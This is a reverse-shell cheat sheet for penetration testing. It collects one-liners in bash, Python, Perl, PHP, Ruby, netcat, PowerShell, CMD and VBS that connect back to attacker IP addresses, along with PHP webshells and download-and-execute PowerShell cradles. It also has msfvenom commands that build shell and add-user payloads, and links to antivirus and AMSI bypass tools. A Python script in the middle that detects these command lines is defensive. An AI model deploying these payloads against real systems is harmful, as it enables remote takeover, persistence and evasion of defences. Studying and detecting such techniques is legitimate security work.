
Reverse shell

Reference: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

/bin/bash -l > /dev/tcp/10.10.14.96/8081 0<&1 2>&1

/bin/bash -l > /dev/tcp/10.10.14.17/8081 0<&1 2>&1

/usr/bin/bash -l > /dev/tcp/10.10.14.17/8081 0<&1 2>&1

PERL

Here’s a shorter, feature-free version of the perl-reverse-shell:

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python 3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.109",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

If you want a .php file to upload, see the more featureful and robust php-reverse-shell.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING-IP/443 0>&1'"); ?>

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.21/443 0>&1'"); ?>
http://10.10.14.21/shell.php
http://10.10.14.21/webshell.php
http://10.10.14.21/webshell.php?cmd=whoami
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);

Webshell

<?php system($_REQUEST['cmd']); ?>

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

Netcat is rarely present on production systems, and even when it is, there are several versions of netcat, some of which don't support the -e option.

nc -e /bin/sh 10.0.0.1 1234
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
/bin/sh | nc 10.0.0.1 80
rm -f /tmp/p; mknod /tmp/p p && nc 10.0.0.1 4444 0</tmp/p | /bin/sh 1>/tmp/p

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f

OpenBSD Netcat

mkfifo /tmp/lol;nc 10.10.14.17 8081 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol

If you have the wrong version of netcat installed, Jeff Price points out that you might still be able to get your reverse shell back like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 8081 >/tmp/f

socat

Generating a certificate so the connection is encrypted

req: initiate a new certificate signing request
-newkey: generate a new private key
rsa:2048: use RSA encryption with a 2,048-bit key length
-nodes: store the private key without passphrase protection
-keyout: save the key to a file
-x509: output a self-signed certificate instead of a certificate request
-days: set validity period in days
-out: save the certificate to a file

1) listener

openssl req -newkey rsa:2048 -nodes -keyout cert.key -x509 -days 362 -out cert.crt
cat cert.key cert.crt > cert.pem

socat OPENSSL-LISTEN:443,cert=cert.pem,verify=0,fork EXEC:/bin/bash

2) client

socat - OPENSSL:192.168.1.26:443,verify=0

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

powershell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.17",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# ESCAPED
$client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.17\",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.10.14.17",8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -ExecutionPolicy Bypass -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 8081 -e powershell"

powershell -ExecutionPolicy Bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.134/invoke-powershell-tcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.134 -Port 443

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8081);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

xterm

One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.

xterm -display 10.0.0.1:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest :1

You'll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0</tmp/p | /bin/bash 1>/tmp/p

CMD

A few comments are in order here. It is worth stressing that all of these depend on a third-party component to work: either netcat, or PowerShell, with two interesting variations.

Since CMD itself provides no tool for obtaining a reverse shell, there are a few interesting options available here. They are:

C:\Windows\System32\cmd.exe /c "mkdir c:\temp & copy \\10.10.14.11\smb\nc64.exe c:\temp\w.exe & c:\temp\w.exe -e C:\Windows\System32\cmd.exe 10.10.14.11 8082"

In this case we have the option of uploading netcat to the target machine and running it as in the command above. Another option would be to use PowerShell to open that shell:

C:\Windows\System32\cmd.exe /c "powershell -ExecutionPolicy Bypass -Command [scriptblock]::Create((Invoke-WebRequest "http://192.168.0.165/shell2.txt").Content).Invoke();"

C:\Windows\System32\cmd.exe /c "powershell -c IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.0.165/powercat.ps1');powercat -c 192.168.0.165 -p 8083 -e powershell"
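The one-liners in the Bash, Netcat, Python, PowerShell, xterm and CMD sections above all leave a recognisable command line behind, which is what an EDR or auditd/Sysmon process-creation rule keys on. The following Python script is an added example, not part of the original cheat sheet or of pentestmonkey's code: it scans a constructed process list (the eight sample entries are invented for this example, using the command-line families from this page) for those patterns and reports the remote endpoint each one would connect back to. The indicator names, the sample data and the endpoint heuristic are all assumptions of this example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Indicator patterns for the one-liner families listed on this page. Each key is
# the label that ends up in the alert. They are deliberately narrow: a bare
# "mkfifo" or "-e" is not enough on its own (see the benign samples below).
INDICATORS = {
    "bash_dev_tcp":          re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "netcat_exec_flag":      re.compile(r"\b(?:nc|ncat|netcat)\b\S*\s.*?-[ce]\s"),
    "named_pipe_shell":      re.compile(r"\b(?:mkfifo|mknod)\b(?=.*\b(?:nc|ncat|netcat|telnet)\b)(?=.*\b(?:ba)?sh\b)"),
    "python_socket_dup2":    re.compile(r"socket\.socket\(.*dup2\("),
    "perl_socket_exec":      re.compile(r"use Socket;.*connect\(.*exec\("),
    "php_fsockopen_exec":    re.compile(r"fsockopen\(.*exec\("),
    "ruby_tcpsocket_exec":   re.compile(r"TCPSocket\.open\(.*\bexec\b"),
    "ps_tcpclient_iex":      re.compile(r"TCPClient\(.*\b(?:iex|Invoke-Expression)\b", re.IGNORECASE),
    "ps_download_cradle":    re.compile(r"DownloadString\(", re.IGNORECASE),
    "xterm_remote_display":  re.compile(r"\bxterm\b.*-display\s+\S+:\d"),
    # Catches a renamed netcat (w.exe / n.exe in the CMD and VBS sections):
    # "-e <shell> <ip> <port>" regardless of the binary name.
    "exec_shell_to_endpoint": re.compile(
        r"\s-e\s+\S*\b(?:cmd|sh|bash|powershell)(?:\.exe)?\b\s+\d{1,3}(?:\.\d{1,3}){3}\s+\d+"),
}

# Heuristic: an IPv4 address followed within a few non-digit characters by a port.
ENDPOINT_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[^\d]{1,6}(\d{2,5})\b")
# X11 display host:N listens on TCP 6000+N (the page's ":1" is port 6001).
XTERM_DISPLAY_RE = re.compile(r"-display\s+([^\s:]+):(\d+)")


@dataclass
class Finding:
    pid: int
    user: str
    indicators: List[str]
    endpoint: Optional[Tuple[str, str]]


def scan_cmdline(cmdline: str) -> List[str]:
    """Return the sorted list of indicator names that match one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def extract_endpoint(cmdline: str) -> Optional[Tuple[str, str]]:
    """Best-effort (host, port) the command would connect back to, or None."""
    m = XTERM_DISPLAY_RE.search(cmdline)
    if m:
        return (m.group(1), str(6000 + int(m.group(2))))
    m = ENDPOINT_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


def scan_processes(procs) -> List[Finding]:
    """procs: iterable of (pid, user, cmdline); returns one Finding per flagged process."""
    findings = []
    for pid, user, cmdline in procs:
        hits = scan_cmdline(cmdline)
        if hits:
            findings.append(Finding(pid, user, hits, extract_endpoint(cmdline)))
    return findings


# Constructed sample process list for this example (not real telemetry).
# Entries 1206 and 1207 are benign look-alikes that must NOT be flagged.
SAMPLE_PROCESSES = [
    (1201, "www-data", "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"),
    (1202, "www-data", "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f"),
    (1203, "tomcat", "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
                     "s.connect((\"192.168.49.109\",80));os.dup2(s.fileno(),0)'"),
    (1204, "SYSTEM", "powershell -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.17/powercat.ps1');"
                     "powercat -c 10.10.14.17 -p 8081 -e powershell\""),
    (1205, "alice", "c:\\temp\\w.exe -e C:\\Windows\\System32\\cmd.exe 10.10.14.11 8082"),
    (1206, "root", "rsync -e ssh /srv/data backup.internal:/srv/data"),
    (1207, "root", "mkfifo /tmp/q; tar -cf - /var | gzip > /tmp/q"),
    (1208, "alice", "xterm -display 10.0.0.1:1"),
]

if __name__ == "__main__":
    for f in scan_processes(SAMPLE_PROCESSES):
        print(f"pid={f.pid} user={f.user} indicators={','.join(f.indicators)} endpoint={f.endpoint}")
```

The two benign entries show why the patterns are combined rather than matched on single tokens: `rsync -e ssh` and a `mkfifo` used for a backup pipeline share keywords with the reverse-shell lines but produce no finding. The `exec_shell_to_endpoint` indicator is what still fires for the renamed netcat binary from the CMD section, where a rule keyed on the process name alone would miss it. Real telemetry would come from auditd EXECVE records or Sysmon event ID 1 instead of the inline list.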

msfvenom

List of payloads

msfvenom -l payloads

Listener for msfvenom payloads:

msf5>use exploit/multi/handler  
msf5>set payload windows/meterpreter/reverse_tcp  
msf5>set lhost   
msf5>set lport   
msf5> set ExitOnSession false  
msf5>exploit -j

Payload options

msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

VBS

Set oT = CreateObject("Wscript.Shell")
oT.Run "cmd.exe /c mkdir c:\temp"
oT.Run "cmd.exe /c curl 10.8.1.121/nc64.exe -o c:\temp\n.exe"
oT.Run "cmd.exe /c c:\temp\n.exe -e cmd 10.8.1.121 8081"

Linux

msfvenom -p linux/x86/shell_reverse_tcp -f elf LHOST=192.168.119.181 LPORT=80 > rshell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Java

WAR PAYLOAD

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.150 LPORT=80 -f war -o rshell.war

JSP PAYLOAD

msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=192.168.119.143 LPORT=5555 > shell.jsp

Creating a payload with encoding

msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

Creating a payload using a template

msfvenom -p [payload] -x [template] -f [formattype] > outputfile

Other payloads

Add a user in windows with msfvenom:

msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Creating an msfvenom payload with an encoder while removing bad characters:

msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/

Bypass AV

# Veil Framework:
https://github.com/Veil-Framework/Veil

# Shellter
https://www.shellterproject.com/download/

# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless: 
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

# Stageless HTA Payload: 
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

# Donut: 
https://github.com/TheWover/donut

# Vulcan
https://github.com/praetorian-code/vulcan

Bypass AMSI

# Testing for AMSI bypass:
https://github.com/rasta-mouse/AmsiScanBufferBypass

# Amsi-Bypass-Powershell
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

https://blog.f-secure.com/hunting-for-amsi-bypasses/
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
https://slaeryan.github.io/posts/falcon-zero-alpha.html

Office Docs

https://github.com/thelinuxchoice/eviloffice
https://github.com/thelinuxchoice/evilpdf